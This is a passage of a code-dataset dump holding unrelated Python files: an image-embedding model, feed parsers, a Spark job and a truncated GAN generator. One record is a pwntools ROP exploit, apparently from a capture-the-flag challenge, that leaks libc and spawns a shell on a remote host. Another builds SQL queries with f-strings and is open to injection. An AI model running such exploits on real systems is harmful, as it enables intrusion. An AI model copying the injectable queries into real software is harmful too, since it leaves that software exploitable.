base_model = Model(base_model.input, normalized, name=\"base_model\")\n    return base_model\n\ndef build_model():\n    base_model = get_base_model()\n\n    positive_example_1 = Input(input_shape+(3,) , name='positive_example_1')\n    negative_example = Input(input_shape+(3,), name='negative_example')\n    positive_example_2 = Input(input_shape+(3,), name='positive_example_2')\n\n    positive_example_1_out = base_model(positive_example_1)\n    negative_example_out = base_model(negative_example)\n    positive_example_2_out = base_model(positive_example_2)\n\n    loss = merge(\n        [positive_example_1_out, negative_example_out, positive_example_2_out],\n        mode=bpr_triplet_loss,\n        name='loss',\n        output_shape=(1, ))\n\n    model = Model(\n        input=[positive_example_1, negative_example, positive_example_2],\n        output=loss)\n    model.compile(loss=identity_loss, optimizer=Adam(0.000001))\n\n    print(model.summary())\n\n    return model\n\nfile_path = \"triplet_model_dim1500.best.hdf5\"\ndef build_inference_model(weight_path=file_path):\n    base_model = get_base_model()\n\n    positive_example_1 = Input(input_shape+(3,) , name='positive_example_1')\n    negative_example = Input(input_shape+(3,), name='negative_example')\n    positive_example_2 = Input(input_shape+(3,), name='positive_example_2')\n\n    positive_example_1_out = base_model(positive_example_1)\n    negative_example_out = base_model(negative_example)\n    positive_example_2_out = base_model(positive_example_2)\n\n    loss = merge(\n        [positive_example_1_out, negative_example_out, positive_example_2_out],\n        mode=bpr_triplet_loss,\n        name='loss',\n        output_shape=(1, ))\n\n    model = Model(\n        input=[positive_example_1, negative_example, positive_example_2],\n        output=loss)\n    model.compile(loss=identity_loss, optimizer=Adam(0.000001))\n\n    model.load_weights(weight_path)\n\n    inference_model = Model(base_model.get_input_at(0), output=base_model.get_output_at(0))\n    inference_model.compile(loss=\"mse\", optimizer=Adam(0.000001))\n    print(inference_model.summary())\n\n    return inference_model\n\ndef read_and_resize(filepath):\n    im = Image.open((filepath)).convert('RGB')\n    im = im.resize(input_shape)\n    im_array = np.array(im, dtype=\"uint8\")[..., ::-1]\n    return np.array(im_array / (np.max(im_array) + 0.001), dtype=\"float32\")\n\n#FINAL grayscale function\ndef random_greyscale(img, p):\n    if np.random.uniform(0, 1) < p:\n        temp = np.dot(img[...,:3], [0.299, 0.587, 0.114])\n        temp = np.stack((temp,) * 3, -1)\n        return temp\n    return img\n\ndef augment(im_array):\n    #flip image\n    if np.random.uniform(0, 1) > 0.5:\n        im_array = np.fliplr(im_array)\n        \n    #FINAL add noise\n    im_array = random_rotation(im_array, rg=360, row_axis=0, col_axis=1, channel_axis=2, fill_mode='nearest')\n    im_array = random_shift(im_array, wrg=0.1, hrg=0.3, row_axis=0, col_axis=1, channel_axis=2, fill_mode='nearest')\n    im_array = random_zoom(im_array, zoom_range=(1, 1.2), row_axis=0, col_axis=1, channel_axis=2, fill_mode='nearest')\n    im_array = random_greyscale(im_array, 0.4)\n    \n    return im_array\n\nclass gen:\n    def __init__(self, triplet_gen):\n        self.triplet_gen = triplet_gen\n        self.lock = threading.Lock()\n    \n    def __iter__(self):\n        return self\n        \n    def __next__(self):\n        with self.lock:\n            list_positive_examples_1 = []\n            list_negative_examples = []\n            list_positive_examples_2 = []\n\n            for i in range(batch_size):\n                positive_example_1, negative_example, positive_example_2 = self.triplet_gen.get_sample()\n                positive_example_1_img, negative_example_img, positive_example_2_img = read_and_resize(base_path+positive_example_1), \\\n                                                                                        read_and_resize(base_path+negative_example), \\\n                                                                                        read_and_resize(base_path+positive_example_2)\n\n                positive_example_1_img, negative_example_img, positive_example_2_img = augment(positive_example_1_img), \\\n                                                                                        augment(negative_example_img), \\\n                                                                                        augment(positive_example_2_img)\n\n                list_positive_examples_1.append(positive_example_1_img)\n                list_negative_examples.append(negative_example_img)\n                list_positive_examples_2.append(positive_example_2_img)\n\n            list_positive_examples_1 = np.array(list_positive_examples_1)\n            list_negative_examples = np.array(list_negative_examples)\n            list_positive_examples_2 = np.array(list_positive_examples_2)\n            return [list_positive_examples_1, list_negative_examples, list_positive_examples_2], np.ones(batch_size)\n                \n# Read data\n#maybe add convert to grey scale\ndata = pd.read_csv('train.csv')\ntrain, test = train_test_split(data, test_size=0.3, shuffle=True, random_state=1337)\nfile_id_mapping_train = {k: v for k, v in zip(train.Image.values, train.Id.values)}\nfile_id_mapping_test = {k: v for k, v in zip(test.Image.values, test.Id.values)}\ntrain_gen = sample_gen(file_id_mapping_train)\ntest_gen = sample_gen(file_id_mapping_test)\n\ndef data_generator(fpaths, batch=16):\n    i = 0\n    for path in fpaths:\n        if i == 0:\n            imgs = []\n            fnames = []\n        i += 1\n        img = read_and_resize(path)\n        imgs.append(img)\n        fnames.append(os.path.basename(path))\n        if i == batch:\n            i = 0\n            imgs = np.array(imgs)\n            yield fnames, imgs\n    if i < batch:\n        imgs = np.array(imgs)\n        yield fnames, imgs\n    raise StopIteration()\n\ndata = pd.read_csv('train.csv')\n\nfile_id_mapping = {k: v for k, v in zip(data.Image.values, data.Id.values)}\n\ninference_model = build_inference_model()\n\ntrain_files = glob.glob(\"./train/*.jpg\")\ntest_files = glob.glob(\"./test/*.jpg\")\n\n#getting train data embedding\nprint(\"Train data embedding\", file=sys.stderr, flush=True)\ntrain_preds = []\ntrain_file_names = []\ni = 1\nfor fnames, imgs in data_generator(train_files, batch=32):\n    print(i*32/len(train_files)*100)\n    i += 1\n    predicts = inference_model.predict(imgs)\n    predicts = predicts.tolist()\n    train_preds += predicts\n    train_file_names += fnames\ntrain_preds = np.array(train_preds)\n\n#getting test data embedding\nprint(\"Test data embedding\", file=sys.stderr, flush=True)\ntest_preds = []\ntest_file_names = []\ni = 1\nfor fnames, imgs in data_generator(test_files, batch=32):\n    print(i * 32 / len(test_files) * 100)\n    i += 1\n    predicts = inference_model.predict(imgs)\n    predicts = predicts.tolist()\n    test_preds += predicts\n    test_file_names += fnames\ntest_preds = np.array(test_preds)\n\nprint(\"Calculate nearest neighbor\", file=sys.stderr, flush=True)\nneigh = NearestNeighbors(n_neighbors=6)\nneigh.fit(train_preds)\ndistances_test, neighbors_test = neigh.kneighbors(test_preds)\ndistances_test, neighbors_test = distances_test.tolist(), neighbors_test.tolist()\n\nprint(\"Predicting\", file=sys.stderr, flush=True)\npreds_str = []\nfor filepath, distance, neighbour_ in zip(test_file_names, distances_test, neighbors_test):\n    sample_result = []\n    sample_classes = []\n    for d, n in zip(distance, neighbour_):\n        train_file = train_files[n].split(os.sep)[-1]\n        class_train = file_id_mapping[train_file]\n        sample_classes.append(class_train)\n        sample_result.append((class_train, d))\n\n    if \"new_whale\" not in sample_classes:\n        sample_result.append((\"new_whale\", 0.1))\n    sample_result.sort(key=lambda x: x[1])\n    sample_result = sample_result[:5]\n    preds_str.append(\" \".join([x[0] for x in sample_result]))\n\ndf = pd.DataFrame(preds_str, columns=[\"Id\"])\ndf['Image'] = [x.split(os.sep)[-1] for x in test_file_names]\ndf.to_csv(sys.argv[1], index=False)\n\nprint(\"Done\", file=sys.stderr, flush=True)","sub_path":"final/src/model1_test.py","file_name":"model1_test.py","file_ext":"py","file_size_in_byte":12270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"455859732","text":"__author__ = 'Lord'\n\nimport shutil\nimport os\nimport sys\n\nprint(\"\\n### process post build\")\n# print(\"[debug] sys args: \")\n# print(sys.argv)\n\nif len(sys.argv) != 2: exit(-1)\n\ndstDir = sys.argv[1]\n\nif sys.platform == 'darwin':\n    bundlePath = 'JekyllPoster.app/Contents/MacOS'\n    dstDir = os.path.join(dstDir, bundlePath)\n\nprint(\"Build path: \" + dstDir)\n\nif not os.path.isdir(dstDir):\n    exit(-2)\n\nthisPath = os.path.realpath(__file__)\nthisDir = os.path.dirname(thisPath)\nsrcFile = os.path.join(thisDir, 'gen_poster.py')\n\nprint(\"copy the following file to build path:\\n%s\\n\" % srcFile)\n\ntry:\n    shutil.copy(srcFile, dstDir)\nexcept:\n    print(\"\")\n    exit(-3)\n\nexit(0)","sub_path":"JekyllPoster/post_build.py","file_name":"post_build.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474301942","text":"from lib.database import db_connect\n\ndef getNilaiKozlov():\n    conn = db_connect()\n    with conn:\n        cur = conn.cursor()\n        cur.execute(f\"SELECT public.bobot_aset.id_app, ((public.bobot_aset.criteria_1*0.3) + (public.bobot_aset.criteria_2*0.4) + (public.bobot_aset.criteria_3*0.3)) as result_assessment, th1, th2,\tth3,\tth4,\tth5,\tth6,\tth7,\tth8,\tth9,\tth10,\tth11,\trisk_value FROM public.bobot_aset JOIN public.nilai_resiko_kozlov ON public.bobot_aset.email = public.nilai_resiko_kozlov.email AND public.bobot_aset.email = 'user@gmail.com' AND public.bobot_aset.id_app = public.nilai_resiko_kozlov.id_app ORDER BY id_app ASC\")\n        data = cur.fetchall()\n        return data\n\ndef getThreatWeight():\n    conn = db_connect()\n    with conn:\n        cur = conn.cursor()\n        cur.execute(f\"select id_app, public.app_threat.id_threat, threat_weight from public.app_threat join public.threat on public.app_threat.id_threat = public.threat.id_threat order by id_app ASC\")\n        data = cur.fetchall()\n        return data\n\ndef insertKozlov(email, th1, th2, th3, th4, th5, th6, th7, th8, th9, th10, th11, risk_value, id_app):\n    conn = db_connect()\n    with conn:\n        cur = conn.cursor()\n        cur.execute(f\"INSERT INTO public.nilai_resiko_kozlov (email, th1, th2, th3, th4, th5, th6, th7, th8, th9, th10, th11, risk_value, id_app) VALUES ('{email}', '{th1}', '{th2}', '{th3}', '{th4}', '{th5}', '{th6}', '{th7}', '{th8}', '{th9}', '{th10}', '{th11}', '{risk_value}', '{id_app}');\")\n    return True\n\ndef updateBobotAsset(email, id_app, criteria_1, criteria_2, criteria_3):\n    conn = db_connect()\n    with conn:\n        cur = conn.cursor()\n        cur.execute(f\"UPDATE public.bobot_aset SET criteria_1='{criteria_1}', criteria_2='{criteria_2}', criteria_3='{criteria_3}' WHERE public.bobot_aset.id_app='{id_app}' AND public.bobot_aset.email='{email}'\")\n    return True\n\ndef deleteKozlov(email):\n    conn = db_connect()\n    with conn:\n        cur = conn.cursor()\n        cur.execute(f\"DELETE FROM public.nilai_resiko_kozlov WHERE public.nilai_resiko_kozlov.email='{email}'\")\n    return True\n","sub_path":"modules/kozlov.py","file_name":"kozlov.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"29570358","text":"from World.Organism import Organism\r\nfrom World.Animal import Animal\r\nimport Point\r\n\r\nclass Fox(Animal.Animal):\r\n    def __init__(self, world, position, age):\r\n        Animal.Animal.__init__(self, world, position, age)\r\n        self._m_organismType = Organism.ORGANISM_TYPE.ANIMAL_FOX\r\n        self._m_force = 3\r\n        self._m_initiative = 7\r\n\r\n    # akcja(ruch) Lisa\r\n    def Action(self):\r\n        newPosition = Point.Point(20, 20)\r\n\r\n        if self._MoveToNextField(newPosition) == self.MOVE.MOVE_COLLISION:\r\n            tempOrganism = self._m_world.GetOrganism(newPosition)\r\n\r\n            if tempOrganism is None:\r\n                return None\r\n\r\n            # jezeli przeciwny organizm jest silniejszy, lis nie rusza sie\r\n            if tempOrganism.GetForce() > self._m_force:\r\n                self._m_world.m_logs += \"{0} {1} zostaje na miejscu, boi sie: {2} {3}\\n\".format(self._m_organismType.value, \r\n                    self._m_position.toString(), tempOrganism.GetOrganismType().value, tempOrganism.GetPosition().toString())\r\n                return None\r\n\r\n            whatHappend = tempOrganism.Collision(self)\r\n\r\n            if whatHappend == self.COLLISIONS.COLLISION_DEFENDING_DIED:\r\n                self._m_world.SetOrganismToDead(newPosition)\r\n                self._m_world.MoveOrganism(self._m_position, newPosition)\r\n                self._m_position = newPosition\r\n            elif whatHappend == self.COLLISIONS.COLLISION_DEFENDING_ESCAPE or whatHappend == self.COLLISIONS.COLLISION_ENEMY_ESCAPE:\r\n                self._m_world.MoveOrganism(self._m_position, newPosition)\r\n                self._m_position = newPosition\r\n            elif whatHappend == self.COLLISIONS.COLISION_ENEMY_DIED:\r\n                self._m_world.SetOrganismToDead(self._m_position)\r\n            elif whatHappend == self.COLLISIONS.COLLISION_BOTH_DIE:\r\n                self._m_world.SetOrganismToDead(newPosition)\r\n                self._m_world.SetOrganismToDead(self._m_position)","sub_path":"World/Animal/Fox.py","file_name":"Fox.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"415633172","text":"class normalizedName(object):\n    '''normalizedName provides relevant functions to process the name normalization tasks mentioned above\n       NOTE: Assumptions about and knowledge of English names / English translated names are ultized to handle each cases\n       Functions:\n             parseRaw() - decipher the order of the raw name string based on 1) number of upper case letters; 2) number of spaces; 3) ',' presented in the string or not;\n             parsePreSuffix(list of strings) - remove any matching prefix or suffix in the lookup tables\n             printNames() - a quick method to print all attributes\n             \n    '''\n    def __init__(self, string):\n        self.raw = string\n        self.first = None\n        self.last = None\n        self.middle = []\n        self.prefix = None\n        self.suffix = None\n        self.CommonPrefix = {'Mr', 'Mrs', 'Ms', 'Miss', 'MSgt', 'Dr', 'Prof', 'Hon', 'Lt', 'Adm', 'Atty', 'Brother', 'Capt', 'Chief', 'Cmdr', 'Col', 'Dean', 'Dr', 'Elder', 'Gen', 'Gov'}  \n        self.CommonSuffix = {'II', 'III', 'IV', 'CPA', 'DDS', 'Esq', 'JD', 'Jr', 'LLD', 'MD', 'PhD', 'Sr'}\n        self.parseRaw()\n        \n    \n    \n    def parsePreSuffix(self, names):\n        toDel = set()\n        # '.' is only detected but not actually removed for abbrevation test later\n        for i, n in enumerate(names):\n            tmp = n[:-1] if n[-1] == '.' else n\n            if tmp in self.CommonPrefix:\n                self.prefix = tmp\n                toDel.add(i)\n            if tmp in self.CommonSuffix:\n                self.suffix = tmp\n                toDel.add(i)\n        return [n for i, n in enumerate(names) if i not in toDel]\n        \n        \n    def parseRaw(self):\n        # Check number of Upper Case letters\n        if sum([1 if c.isupper() else 0 for c in self.raw]) > 1:\n            # Assume Upper Letter followed by a Lower Case is the start of an element,\n            #ensure there are at least a space before them and ignore the last letter\n            self.raw = ''.join([' '+ c if c.isupper() and self.raw[i+1].islower() else c for i,c in enumerate(self.raw[:-1])])\n        # Handle ',' as an order indicator\n        if ',' in self.raw:\n            # Swap the first element before ',' to the end, space separated\n            tmp = self.raw.split(',')\n            self.raw = ' '.join(tmp[1:]) + ' ' + tmp[0]\n        # Remove Hyphens\n        if '-' in self.raw:\n            # Replace hypens\n            self.raw.replace('-', ' ')\n        # Ensure '.' follows with a space for seperation\n        if '.' in self.raw:\n            self.raw = ''.join([' ' if c == '.' else c for c in self.raw])\n            \n        # Check spaces and convert to lower cases\n        names = self.raw.split()\n        # Process Pre/Suffix\n        names = self.parsePreSuffix(names)\n\n        \n        if len(names) == 1:\n            # Only single element given, could be either first or last name\n            self.first = names[0].lower()\n        elif len(names) == 2:\n            self.first, self.last = names[0].lower(), names[1].lower()\n        else:\n            # More than 2 elements given, all extras go to middle\n            self.first, self.last = names[0].lower(), names[-1].lower()\n            self.middle = [ n.lower() for n in names[1:-1]]\n    \n    def printNames(self):\n        print(\"First: {}, Middles: {}, Last: {}\".format(self.first, self.middle, self.last))\n        print(\"Prefix: {}, Suffix: {}\".format(self.prefix, self.suffix))\n    \n    def flatten(self):\n        '''Build all the avaialble name elements into an 1D array [first, middle_concat, last, prefix, suffix] '''\n        elements = [self.first]\n        if self.middle: \n            elements.append(''.join(self.middle))\n        else:\n            elements.append(None)\n        elements.append(self.last)\n        elements.append(self.prefix)\n        elements.append(self.suffix)\n        return elements\n            ","sub_path":"lib/normalizedName.py","file_name":"normalizedName.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"294115417","text":"from hashlib import sha1\nimport feedparser\nimport markdown\nimport os\nimport re\nimport time\nimport unicodedata\n\n\ndef create_source(source_data):\n    return source_map[source_data['kind']](source_data)\n\n\n# slugify from Django source (BSD license)\ndef slugify(value):\n    value = unicodedata.normalize('NFKD', unicode(value)).encode('ascii', 'ignore')\n    value = unicode(re.sub('[^\\w\\s-]', '', value).strip().lower())\n    return re.sub('[-\\s]+', '-', value)\n\n\nclass Source(object):\n    def __init__(self, config=None):\n        self.config = config or {}\n        self.config['kind'] = self.kind\n\n    def fetch(self): raise NotImplementedError\n\n\nclass DirectorySource(Source):\n    def fetch(self):\n        path = self.config.get('path')\n        events = []\n\n        for filename in os.listdir(path):\n            full_path = path + '/' + filename\n\n            if not os.path.isfile(full_path):\n                continue\n\n            with open(full_path) as f:\n                raw = f.read()\n\n            event = {\n                'filename'  : filename,\n                'full_path' : full_path,\n                'raw'       : raw,\n                'timestamp' : time.gmtime(os.path.getmtime(full_path)),\n            }\n\n            event = self.process_event(event)\n\n            if event:\n                events.append(event)\n\n        return events\n\n    def process_event(self, event):\n        return event\n\n    @property\n    def source_id(self):\n        return self.kind+':'+self.config['path']\n\n    @classmethod\n    def configure(cls, path):\n        return cls({'path':path.rstrip('/')})\n\n\nclass FeedSource(Source):\n    def fetch(self):\n        since = self.config.get('since', {})\n        feed = feedparser.parse(self.config['url'],\n                modified = time.gmtime(since['modified'])\n                            if since.get('modified')\n                            else None,\n                etag = since.get('etag'))\n\n        if feed.status == 304 or feed.status >= 400:\n            return []\n        else:\n            events = []\n            for entry in feed.entries:\n                event = {\n                    'author'     : entry.get('author'),\n                    'summary'    : entry.get('title'),\n                    'timestamp'  : entry.get('published_parsed') or entry.get('updated_parsed'),\n                    'event_link' : entry.get('link'),\n                    'data'       : entry\n                }\n\n                if 'content' in entry:\n                    event['content'] = entry.get('content')[0]['value'],\n\n                events.append(self.process_event(event))\n\n            self.config['since'] = {'etag': feed.get('etag'), 'modified': feed.get('modified')}\n            return events\n\n    def process_event(self, event):\n        return event\n\n\nclass SiteFeedSource(FeedSource):\n    url_format = ''\n    def __init__(self, config):\n        FeedSource.__init__(self, config)\n        self.config['url'] = self.url_format.format(username=self.config['username'])\n\n    @property\n    def source_id(self):\n        return self.kind+':'+self.config['username']\n\n    @classmethod\n    def configure(cls, username):\n        return cls({'username':username})\n\n\nclass DeliciousSource(SiteFeedSource):\n    url_format = 'http://feeds.delicious.com/v2/rss/{username}?count=50'\n    kind = 'delicious'\n    def process_event(self, event):\n        event['author'] = self.config['username']\n        event['summary'] = 'bookmarked ' + event['data']['title']\n        return event\n\n\nclass TumblrSource(SiteFeedSource):\n    url_format = 'http://{username}.tumblr.com/rss'\n    kind = 'tumblr'\n    def process_event(self, event):\n        event['author'] = self.config['username']\n        event['summary'] = 'posted ' + event['data']['title']\n        return event\n\n\nclass FanFictionSource(SiteFeedSource):\n    url_format = 'http://b.fanfiction.net/atom/u/{username}/'\n    kind = 'fanfiction'\n    def process_event(self, event):\n        event['summary'] = 'wrote a chapter in ' + event['data']['title']\n        return event\n\n\nclass FlickrSource(SiteFeedSource):\n    url_format = 'http://api.flickr.com/services/feeds/photos_public.gne?id={username}&lang=en-us&format=rss_200'\n    kind = 'flickr'\n    def process_event(self, event):\n        event['summary'] = 'posted photo ' + event['data']['title']\n        return event\n\n\nclass GitHubSource(SiteFeedSource):\n    url_format = 'https://github.com/{username}.atom'\n    kind = 'github'\n    def process_event(self, event):\n        summary = event['data']['title']\n        if summary.startswith(self.config['username']):\n            event['summary'] = summary[summary.find(' ') + 1:]\n        return event\n\n\nclass GroovesharkSource(SiteFeedSource):\n    url_format = 'http://api.grooveshark.com/feeds/1.0/users/{username}/recent_favorite_songs.rss'\n    kind = 'grooveshark'\n    def process_event(self, event):\n        event['author'] = self.config['username']\n        event['summary'] = 'favorited ' + event['data']['title']\n        return event\n\n\nclass LastFMSource(SiteFeedSource):\n    url_format = 'http://ws.audioscrobbler.com/2.0/user/{username}/recenttracks.rss?limit=50'\n    kind = 'lastfm'\n    def process_event(self, event):\n        event['summary'] = 'listened to ' + event['data']['title']\n        event['artist'], event['track'] = event['data']['title'].split(u' \\u2013 ')\n        return event\n\n\nclass MarkdownSource(DirectorySource):\n    kind = 'markdown'\n    def process_event(self, event):\n        md = markdown.Markdown(extensions=['meta', 'tables', 'fenced_code', 'headerid'])\n        event['content'] = md.convert(event['raw'])\n        event['title'] = ' '.join(md.Meta.get('title', [event['filename']]))\n        event['author'] = ' '.join(md.Meta.get('author', ['']))\n        event['slug'] = '-'.join(md.Meta.get('slug', [slugify(event['title'])]))\n        event['summary'] = 'posted ' + event['title']\n        event['meta'] = md.Meta\n        if md.Meta.get('published'):\n            # Parse time, then convert struct_time (local) -> epoch (GMT) -> struct_time (GMT)\n            event['timestamp'] = time.gmtime(time.mktime(time.strptime(' '.join(md.Meta.get('published')), '%Y-%m-%d %H:%M:%S')))\n        event['_id'] = sha1(event['full_path'].encode('utf-8')).hexdigest()\n        if time.gmtime() < event['timestamp']:\n            return None\n        else:\n            return event\n\n\nclass RedditSource(SiteFeedSource):\n    url_format = 'http://www.reddit.com/user/{username}/submitted/.rss'\n    kind = 'reddit'\n    def process_event(self, event):\n        event['summary'] = 'submitted ' + event['data']['title']\n        return event\n\n\nclass TwitterSource(SiteFeedSource):\n    url_format = 'http://api.twitter.com/1/statuses/user_timeline.atom?screen_name={username}'\n    kind = 'twitter'\n    def process_event(self, event):\n        event['content'] = event['data']['content'][0]['value'].partition(': ')[2]\n        event['summary'] = 'tweeted \"'+event['content']+'\"'\n        return event\n\n\nsource_map = {\n    'delicious': DeliciousSource,\n    'fanfiction': FanFictionSource,\n    'flickr': FlickrSource,\n    'github': GitHubSource,\n    'grooveshark': GroovesharkSource,\n    'lastfm': LastFMSource,\n    'markdown': MarkdownSource,\n    'reddit': RedditSource,\n    'twitter': TwitterSource,\n    'tumblr': TumblrSource,\n}\n","sub_path":"been/sources.py","file_name":"sources.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"235922456","text":"from pwn import *\n\nenv = {\"LD_PRELOAD\": \"./libc6_2.31-0ubuntu9_amd64.so\"}\n#io = process(\"./pwn_baby_rop\", env=env)\nio = remote(\"34.89.143.158\", 31042)\n\nio.recvuntil(\"black magic.\\n\")\n\n#gdb.attach(io)\n\n\n# 1st stage\nmain = 0x40145C\nputs = 0x401030\nputs_got = 0x404018\npop_rdi = 0x00401663\n\npayload = b\"\"\npayload += b\"A\" * 264\npayload += p64(pop_rdi)\npayload += p64(puts_got)\npayload += p64(puts)\npayload += p64(main)\n\nio.sendline(payload)\n\nputs_addr = io.recvline()[:-1].ljust(8, b\"\\x00\")\nputs_addr = u64(puts_addr)\nlog.info('puts address: ' + hex(puts_addr))\nputs_offset = 0x0875a0\nlibc_base = puts_addr - puts_offset\nlog.info('LIBC base address: ' + hex(libc_base))\n\n\n# 2nd stage\npop_rsi_r15 = 0x00401661\npop_rdx_r12 = libc_base + 0x0011c1e1\nsys_gadget = libc_base + 0xe6ce9\nlog.info('gadget address: ' + hex(sys_gadget))\n\nnew_rbp_value = 0x00404500\n\npayload = b\"\"\npayload += b\"A\" * 256\npayload += p64(new_rbp_value)\npayload += p64(pop_rsi_r15)\npayload += p64(0x0)\npayload += p64(0x0)\npayload += p64(pop_rdx_r12)\npayload += p64(0x0)\npayload += p64(0x0)\npayload += p64(sys_gadget)\n\nio.sendline(payload)\nio.interactive()\n","sub_path":"exploit_remote.py","file_name":"exploit_remote.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396079284","text":"from datetime import datetime\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, date_format, udf\nfrom pyspark.sql.types import (DateType, IntegerType, FloatType, StructField,\n                               StructType, TimestampType)\n\nspark = SparkSession.builder.appName(\"Read Transactions\").getOrCreate()\n\ncsv_schema = StructType([StructField('customer_id', IntegerType()),\n                         StructField('amount', FloatType()),\n                         StructField('purchased_at', TimestampType()),\n                         ])\n\ndataframe = spark.read.csv(\"transactions.csv\",\n                           schema=csv_schema,\n                           header=True)\n\ndataframe.show()\n\n# Add a new column by formatting the original date\n\nformatted_df = dataframe.withColumn(\"date_string\",\n                                    date_format(col(\"purchased_at\"),\n                                                'MM/dd/yyyy'))\nformatted_df.show()\n\n# Create a user defined function\nstring_to_date = \\\n    udf(lambda text_date: datetime.strptime(text_date, '%m/%d/%Y'),\n        DateType())\n\ntyped_df = formatted_df.withColumn(\n    \"date\", string_to_date(formatted_df.date_string))\ntyped_df.show()\ntyped_df.printSchema()\n","sub_path":"transactions/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"167129875","text":"#__author__=\"G\"\n#date: 2019/11/14\n\nfrom web_unittest.common import contants\nimport os\n\ndef get_filelist(dir):\n    Filelist = []\n\n    for home, dirs, files in os.walk(dir):\n\n        for filename in files:\n\n        # 文件名列表,包含完整路径\n\n            # Filelist.append(os.path.join(home, filename))\n\n            # 文件名列表,只包含文件名\n\n            Filelist.append(filename)\n\n    return Filelist\n\nif __name__ == \"__main__\":\n\n    Filelist = get_filelist(contants.screenshot_dir)\n\n    print(len(Filelist))\n\n    print(Filelist[-1])\n    for file in Filelist:\n\n        print(file)\n","sub_path":"web_unittest/common/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"462265408","text":"from tensorlayer.layers import *\r\nfrom tensorlayer.activation import *\r\nimport tensorflow as tf\r\nimport tensorlayer as tl\r\n\r\nt_dim = 254\r\n#z_dim = 512         # Noise dimension\r\nimage_size = 64     # 64 x 64\r\nc_dim = 3           # for rgb\r\n\r\ndef generator_txt2img_resnet(input_z_txt, is_train=True):\r\n    \"\"\" z + (txt) --> 64x64 \"\"\"\r\n    # https://github.com/hanzhanggit/StackGAN/blob/master/stageI/model.py\r\n    s = image_size # output image size [64]\r\n    s2, s4, s8, s16 = int(s/2), int(s/4), int(s/8), int(s/16)\r\n    gf_dim = 128\r\n\r\n    w_init = tf.random_normal_initializer(stddev=0.02)\r\n    gamma_init = tf.random_normal_initializer(1., 0.02)\r\n\r\n    net_in = Input(input_z_txt)\r\n\r\n    # if t_txt is not None:\r\n    # net_txt = Input(t_txt)\r\n    # net_txt = Dense(n_units=t_dim, act=lambda x: lrelu(x, 0.2), W_init=w_init, name='g_reduce_text/dense')(net_txt)\r\n    # net_in = Concat([net_in, net_txt], concat_dim=1, name='g_concat_z_txt')\r\n\r\n    net_h0 = Dense(gf_dim * 8 * s16 * s16, act=tf.identity, W_init=w_init, b_init=None, name='g_h0/dense')(net_in)\r\n    net_h0 = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='g_h0/batch_norm')(net_h0)\r\n    net_h0 = Reshape([-1, s16, s16, gf_dim * 8], name='g_h0/reshape')(net_h0)\r\n\r\n    net = Conv2d(gf_dim * 2, (1, 1), (1, 1), padding='VALID', act=None, W_init=w_init, b_init=None, name='g_h1_res/conv2d')(net_h0)\r\n    net = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='g_h1_res/batch_norm')(net)\r\n    net = Conv2d(gf_dim * 2, (3, 3), (1, 1), padding='SAME', act=None, W_init=w_init, b_init=None, name='g_h1_res/conv2d2')(net)\r\n    net = BatchNorm(act=tl.act.lrelu, is_train=is_train, gamma_init=gamma_init, name='g_h1_res/batch_norm2')(net)\r\n    net = Conv2d(gf_dim * 8, (3, 3), (1, 1), padding='SAME', act=None, W_init=w_init, b_init=None, name='g_h1_res/conv2d3')(net)\r\n    net = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='g_h1_res/batch_norm3')(net)\r\n    net_h1 = Elementwise(act=tl.act.lrelu, combine_fn=tf.add, name='g_h1_res/add')([net_h0, net])\r\n    # net_h1 = Layer(act=lrelu)(net_h1)\r\n    # net_h1.outputs = tf.nn.relu(net_h1.outputs)\r\n\r\n    net_h2 = DeConv2d(gf_dim * 4, (4, 4), strides=(2, 2), padding='SAME', act=None,W_init=w_init, name='g_h2/decon2d')(net_h1)\r\n    net_h2 = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='g_h2/batch_norm')(net_h2)\r\n\r\n    net = Conv2d(gf_dim, (1, 1), (1, 1), padding='VALID', act=None, W_init=w_init, b_init=None, name='g_h3_res/conv2d')(net_h2)\r\n    net = BatchNorm(act=tl.act.lrelu, is_train=is_train, gamma_init=gamma_init, name='g_h3_res/batch_norm')(net)\r\n    net = Conv2d(gf_dim, (3, 3), (1, 1), padding='SAME', act=None, W_init=w_init, b_init=None, name='g_h3_res/conv2d2')(net)\r\n    net = BatchNorm(act=tl.act.lrelu, is_train=is_train, gamma_init=gamma_init, name='g_h3_res/batch_norm2')(net)\r\n    net = Conv2d(gf_dim * 4, (3, 3), (1, 1), padding='SAME', act=None, W_init=w_init, b_init=None, name='g_h3_res/conv2d3')(net)\r\n    net = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='g_h3_res/batch_norm3')(net)\r\n    net_h3 = Elementwise(act=tl.act.lrelu, combine_fn=tf.add, name='g_h3/add')([net_h2, net])\r\n    # net_h3.outputs = tf.nn.relu(net_h3.outputs)\r\n\r\n    net_h4 = DeConv2d(gf_dim * 2, (4, 4), strides=(2, 2), padding='SAME', act=None, W_init=w_init, name='g_h4/decon2d')(net_h3)\r\n    net_h4 = BatchNorm(act=tl.act.lrelu, is_train=is_train, gamma_init=gamma_init, name='g_h4/batch_norm')(net_h4)\r\n\r\n    net_h5 = 